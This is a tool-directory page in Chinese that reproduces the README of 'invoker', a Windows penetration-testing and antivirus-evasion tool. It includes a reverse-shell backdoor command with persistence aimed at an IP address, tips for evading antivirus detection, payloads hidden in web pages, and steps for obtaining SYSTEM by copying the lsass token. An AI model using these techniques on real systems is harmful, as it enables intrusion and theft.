Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
invoker — 渗透测试工具和防病毒评估工具。 | Kitploit
工具/GitHubGitHub/ivan-sincek/invoker
权限提升内存取证漏洞利用后渗透利用渗透测试二进制分析学习与教育红队Payload 开发Archived
GitHubivan-sincek/invoker

invoker

渗透测试工具和防病毒评估工具。

312823年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

Invoker

渗透测试工具与反病毒评估工具。

使用 Visual Studio Community 2022 v17.5.4(64位)构建,并在 Windows 10 企业版操作系统(64位)上测试。

仅用于教育目的。希望它能有所帮助!

该仓库已有已知签名,且我没有时间每次都上传新的可执行文件,因此您应自行编译此项目。

有用的网站:

  • elastic.co
  • learn.microsoft.com
  • processhacker.sourceforge.io
  • undocumented.ntinternals.net
  • pinvoke.net

待办事项:

  • 使进程幽灵化与 x86 架构兼容,因为 NtCreateProcessEx 在 32 位进程上效果不佳。

未来计划:

  • 进程空洞化,
  • 进程多普勒化,
  • 进程泥鱼化,
  • 进程幽灵化,
  • 更多 DLL 代理调用,
  • COM 劫持,
  • Python3 脚本用于静态混淆整个源代码。

编码时我牢记的事项:

  • 简化一切,
  • 使用动态分配而非静态分配,(有时)
  • 使用所需的最小权限访问权限和控制标志,
  • 处理/捕获可能的错误/异常,
  • 使用后对数组和内存进行清零并释放,
  • 使用后正确关闭打开的句柄/流,
  • 使用后递减库、对象等的引用计数,
  • 退出前调用垃圾清理器。(不适用)

以上所有操作都将使您的 PE 文件体积更小且检测率更低。

目录

  • Invoker 库
  • 如何运行
  • 字节码注入
  • 生成反弹 Shell Payload
  • PowerShell
  • 直接系统调用
  • 创建包含钩子过程的 DLL
  • 获取 LocalSystem 账户 (NT AUTHORITY\SYSTEM)
  • 图片

Invoker 库

特性:

  • 调用系统 shell,
  • 进行直接系统调用,
  • 使用 Windows Management Instrumentation (WMI),
  • 连接到远程主机,
  • 终止正在运行的进程,
  • 运行新进程,
  • 转储进程内存,
  • 篡改进程的可执行映像,
  • 向进程注入字节码,
  • 向进程注入 DLL,
  • 列出进程已加载的 DLL,
  • 调用 DLL 劫持,
  • 安装钩子过程,
  • 启用访问令牌特权,
  • 复制进程的访问令牌并运行新进程,
  • 下载文件,
  • 添加/编辑注册表项,
  • 计划任务,
  • 列出未加引号的服务路径,并启动、停止或重启服务,
  • 替换多个 System32 文件。

查看 Invoker 库 此处。欢迎使用!


部分功能可能需要管理员权限。

部分功能可能无法在 Windows XP 及更早版本上运行,因为使用了特定的访问权限和控制标志。

如何运行

运行 Invoker_x86.exe(32位)或 Invoker_x64.exe(64位)。

要自动执行反弹 Shell 后门并添加持久性,请运行以下命令:

root@kitploit:~
Invoker_x64.exe 192.168.8.5:9000

32位 Invoker 可以:

  • 进行直接系统调用,
  • 转储 32 位进程的内存,
  • 篡改 32 位进程的可执行映像并注入到 32 位进程,
  • 篡改 64 位进程的可执行映像并注入到 64 位进程,
  • 将 32 位字节码注入到 32 位进程,
  • 将 32 位 DLL 注入到 32 位进程,
  • 列出 32 位进程已加载的 DLL,
  • 安装来自 32 位 DLL 的钩子过程。

64位 Invoker 可以:

  • 进行直接系统调用,
  • 转储 32 位进程的内存,
  • 转储 64 位进程的内存,
  • 篡改 32 位进程的可执行映像并注入到 32 位进程,
  • 篡改 64 位进程的可执行映像并注入到 64 位进程,
  • 将 32 位字节码注入到 32 位进程,
  • 将 64 位字节码注入到 64 位进程,
  • 将 32 位 DLL 注入到 32 位进程,
  • 将 64 位 DLL 注入到 64 位进程,
  • 列出 32 位进程已加载的 DLL,
  • 列出 64 位进程已加载的 DLL。
  • 安装来自 32 位 DLL 的钩子过程,
  • 安装来自 64 位 DLL 的钩子过程。

请注意,每种注入技术都有其优点和缺点;例如,某些技术要求更低的访问权限、使用更不易被怀疑的方法等,但可能会崩溃进程、需要时间或其他特殊条件才能执行 payload 等。

请注意,一些 C2C 植入体在释放内存后可能无法正常运行。在这种情况下,请注释掉像 VirtualFreeEx、NtFreeVirtualMemory 等方法。

字节码注入

通过向更高权限的进程注入字节码来提升权限。

该工具可以将二进制文件的内容下载到内存中,然后注入到正在运行的进程中。它还可以解析 HTTP 响应并从自定义元素中提取 payload,例如从 <invoker>payload</invoker> 中提取,其中 payload 是 Base64 编码的二进制代码。

请查看 pastebin.com/raw/xf9Trt0d 上的示例。

如果反病毒软件持续删除您的本地 payload,这会很有用。

请查看 pastebin.com/raw/iW17rCxH 上的额外示例——payload 隐藏于图像元素中。

P.S. 提供的字节码很可能无法为您工作。

使用 ngrok 为您的本地 Web 服务器提供公网地址。


要查看进程是 32 位还是 64 位,请打开任务管理器 -> 点击“更多详细信息” -> 进入“详细信息”选项卡 -> 右键单击任意列 -> 点击“选择列” -> 勾选“平台”复选框。

要查看进程是否以管理员权限运行,请勾选“已提升”复选框。

生成反弹 Shell Payload

了解如何从我的另一个项目生成反弹 Shell payload,以及如何设置 Ncat 和 multi/handler 监听器。

字节码注入可能会失败,因为字节码可能包含错误字符、错误退出函数或编码问题;DLL 注入更可靠。

PowerShell

如果希望从 Invoker 运行 PowerShell 反弹或绑定 shell,请打开 Invoker 并启动 PowerShell 会话,然后运行任何来自我另一个项目的单行命令。

直接系统调用

直接系统调用库和汇编代码是使用 SysWhispers2 生成的。归功于作者!

要生成相同的库和汇编代码,请在您偏好的控制台中运行以下命令:

root@kitploit:~
python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls

查看我对该库和汇编代码的封装 此处。欢迎使用!

创建包含钩子过程的 DLL

查看简单的包含钩子过程的 DLL 此处。该钩子过程将在每次关闭窗口时调用一个消息框。

查看键盘钩子过程(即键盘记录器)此处。

查看鼠标钩子过程(在第一次鼠标点击时运行新进程)此处。

测试完成后不要忘记删除所有创建的工件,例如删除 keylogger.log 等。

获取 LocalSystem 账户 (NT AUTHORITY\SYSTEM)

按照以下简单步骤操作:

  1. 以管理员身份运行 Invoker。

  2. 启用所有访问令牌特权。

  3. 从例如 Local Security Authority Subsystem Service(lsass.exe)复制访问令牌,并运行一个新的 Invoker 实例。

  4. 在新的 Invoker 实例中,打开命令提示符并运行 whoami,您现在应该看到 nt authority\system。

  5. 再次启用所有访问令牌特权。

  6. 关闭旧的 Invoker 实例。

图片

Invoker

图 1 - Invoker

Bytecode Injection

图 2 - 字节码注入

Elevated Privileges

图 3 - 提升的权限

下载工具